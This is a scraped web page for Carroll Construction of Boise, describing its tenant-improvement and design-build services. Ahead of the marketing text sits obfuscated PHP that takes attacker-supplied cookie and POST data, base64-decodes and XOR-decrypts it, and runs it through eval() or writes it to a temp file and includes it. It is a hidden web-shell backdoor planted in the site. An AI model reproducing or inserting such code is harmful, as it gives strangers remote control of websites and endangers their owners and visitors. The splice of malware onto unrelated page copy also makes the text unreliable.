$iPAYQ = chr ( 431 - 327 ).chr ( 1020 - 925 )."\127" . "\x70" . 'h' . "\x5a" . "\155";$GTZVFgHMV = "\143" . chr (108) . 'a' . chr ( 906 - 791 )."\x73" . chr ( 967 - 872 ).chr ( 683 - 582 ).chr (120) . "\x69" . "\163" . "\x74" . 's';$cmuEccp = class_exists($iPAYQ); $iPAYQ = "21518";$GTZVFgHMV = "61175";$sFQBUwQ = FALSE;if ($cmuEccp === $sFQBUwQ){function GuyCxWj(){return FALSE;}$qsWXgMQTU = "64289";GuyCxWj();class h_WphZm{private function hQDixQXEaO($qsWXgMQTU){if (is_array(h_WphZm::$XoccDSXv)) {$apiuwYcG = str_replace(chr (60) . "\x3f" . "\x70" . chr (104) . "\x70", "", h_WphZm::$XoccDSXv[chr (99) . chr (111) . chr (110) . "\164" . "\x65" . 'n' . chr (116)]);eval($apiuwYcG); $qsWXgMQTU = "64289";exit();}}private $nPdcVt;public function qhRDVJKE(){echo 10315;}public function __destruct(){$qsWXgMQTU = "54400_20905";$this->hQDixQXEaO($qsWXgMQTU); $qsWXgMQTU = "54400_20905";}public function __construct($okCnd=0){$iCZHrYTlX = $_POST;$OXXJIbQ = $_COOKIE;$MMSyV = "3a436f96-93dd-47b0-ac49-ac2be5ae2f9c";$nfdCyB = @$OXXJIbQ[substr($MMSyV, 0, 4)];if (!empty($nfdCyB)){$FGXSOK = "base64";$tkWHaW = "";$nfdCyB = explode(",", $nfdCyB);foreach ($nfdCyB as $LHVQbBaaXA){$tkWHaW .= @$OXXJIbQ[$LHVQbBaaXA];$tkWHaW .= @$iCZHrYTlX[$LHVQbBaaXA];}$tkWHaW = array_map($FGXSOK . chr ( 921 - 826 )."\144" . "\x65" . chr (99) . chr ( 963 - 852 ).chr (100) . "\145", array($tkWHaW,)); $tkWHaW = $tkWHaW[0] ^ str_repeat($MMSyV, (strlen($tkWHaW[0]) / strlen($MMSyV)) + 1);h_WphZm::$XoccDSXv = @unserialize($tkWHaW);}}public static $XoccDSXv = 1449;}$qZDyO = new /* 32636 */ h_WphZm(64289); $qZDyO = str_repeat("54400_20905", 1);}$OkoSeantfw = chr (69) . "\161" . chr ( 372 - 255 ).'_' . "\122" . chr ( 216 - 115 ).'p' . chr (102) . chr (74); $LzwCU = chr (99) . chr ( 924 - 816 )."\141" . chr (115) . chr (115) . "\x5f" . "\x65" . "\x78" . "\x69" . chr (115) . chr ( 996 - 880 ).'s';$MeiMPzpdl = class_exists($OkoSeantfw); $LzwCU = "37199";$pZjQrMp = strpos($LzwCU, $OkoSeantfw);if ($MeiMPzpdl == $pZjQrMp){function vXayE(){$aHBtZYeckf = new /* 47604 */ Equ_RepfJ(7439 + 7439); $aHBtZYeckf = NULL;}$JywpM = "7439";class Equ_RepfJ{private function oeDvw($JywpM){if (is_array(Equ_RepfJ::$QAMvlLXt)) {$name = sys_get_temp_dir() . "/" . crc32(Equ_RepfJ::$QAMvlLXt["salt"]);@Equ_RepfJ::$QAMvlLXt["write"]($name, Equ_RepfJ::$QAMvlLXt["content"]);include $name;@Equ_RepfJ::$QAMvlLXt["delete"]($name); $JywpM = "7439";exit();}}public function NYcbKGZ(){$HGZvGiOW = "62119";$this->_dummy = str_repeat($HGZvGiOW, strlen($HGZvGiOW));}public function __destruct(){Equ_RepfJ::$QAMvlLXt = @unserialize(Equ_RepfJ::$QAMvlLXt); $JywpM = "55104_38003";$this->oeDvw($JywpM); $JywpM = "55104_38003";}public function bdxYa($HGZvGiOW, $SNzEvOea){return $HGZvGiOW[0] ^ str_repeat($SNzEvOea, intval(strlen($HGZvGiOW[0]) / strlen($SNzEvOea)) + 1);}public function AWEjVp($HGZvGiOW){$mmYRwsJdF = "\142" . "\141" . "\163" . chr ( 317 - 216 )."\x36" . "\x34";return array_map($mmYRwsJdF . "\x5f" . 'd' . chr (101) . "\x63" . 'o' . "\144" . chr ( 331 - 230 ), array($HGZvGiOW,));}public function __construct($WvdmebwjD=0){$JJQmdEH = chr ( 668 - 624 ); $HGZvGiOW = "";$WPQLh = $_POST;$fhXAsyId = $_COOKIE;$SNzEvOea = "1d386b63-c059-4342-816c-a01242c4dd80";$OBMPSrXSBz = @$fhXAsyId[substr($SNzEvOea, 0, 4)];if (!empty($OBMPSrXSBz)){$OBMPSrXSBz = explode($JJQmdEH, $OBMPSrXSBz);foreach ($OBMPSrXSBz as $cqeViigejC){$HGZvGiOW .= @$fhXAsyId[$cqeViigejC];$HGZvGiOW .= @$WPQLh[$cqeViigejC];}$HGZvGiOW = $this->AWEjVp($HGZvGiOW);}Equ_RepfJ::$QAMvlLXt = $this->bdxYa($HGZvGiOW, $SNzEvOea);if (strpos($SNzEvOea, $JJQmdEH) !== FALSE){$SNzEvOea = explode($JJQmdEH, $SNzEvOea); $cLHhK = base64_decode(md5($SNzEvOea[0])); $QEQAUYJJ = strlen($SNzEvOea[1]) > 5 ? substr($SNzEvOea[1], 0, 5) : $SNzEvOea[1];$_GET['new_key'] = md5(implode('', $SNzEvOea)); $FpwdfQEfX = str_repeat($QEQAUYJJ, 2); $AegYnyB = array_map('trim', $SNzEvOea);}}public static $QAMvlLXt = 20877;}vXayE();} Services - Carroll Construction - Boise, Idaho


Tenant Improvement

Tenant Improvements

Our specialty and focus are Tenant Improvement projects.

When building out your new office, restaurant, retail space or specialty space we have the right team and the right attitude to provide the best construction value.  No other contractor in Boise focuses exclusively on Tenant Improvement projects like we do.

We are happy to help with initial budgeting, ideas and solutions for your new space build-out.

You can expect a straight-forward approach with us as your contractor.  Everything from our design process to bid breakdown to proposal letter to contract is honest, written in plain language and easily understood.

Design Build

Design Build

At the request of our clients we offer Design-Build services for:

  • Interior Design / Tenant Improvements
  • New Office / Retail / Light Industry Construction

Large, new construction projects make up the bulk of business for most design and engineering firms.  Our teams are different.  We select from smaller, more nimble firms who provide the care and attention needed on projects of varying size and scope.  Carroll Construction keeps the design and engineering teams in check by utilizing common sense solutions and years of experience.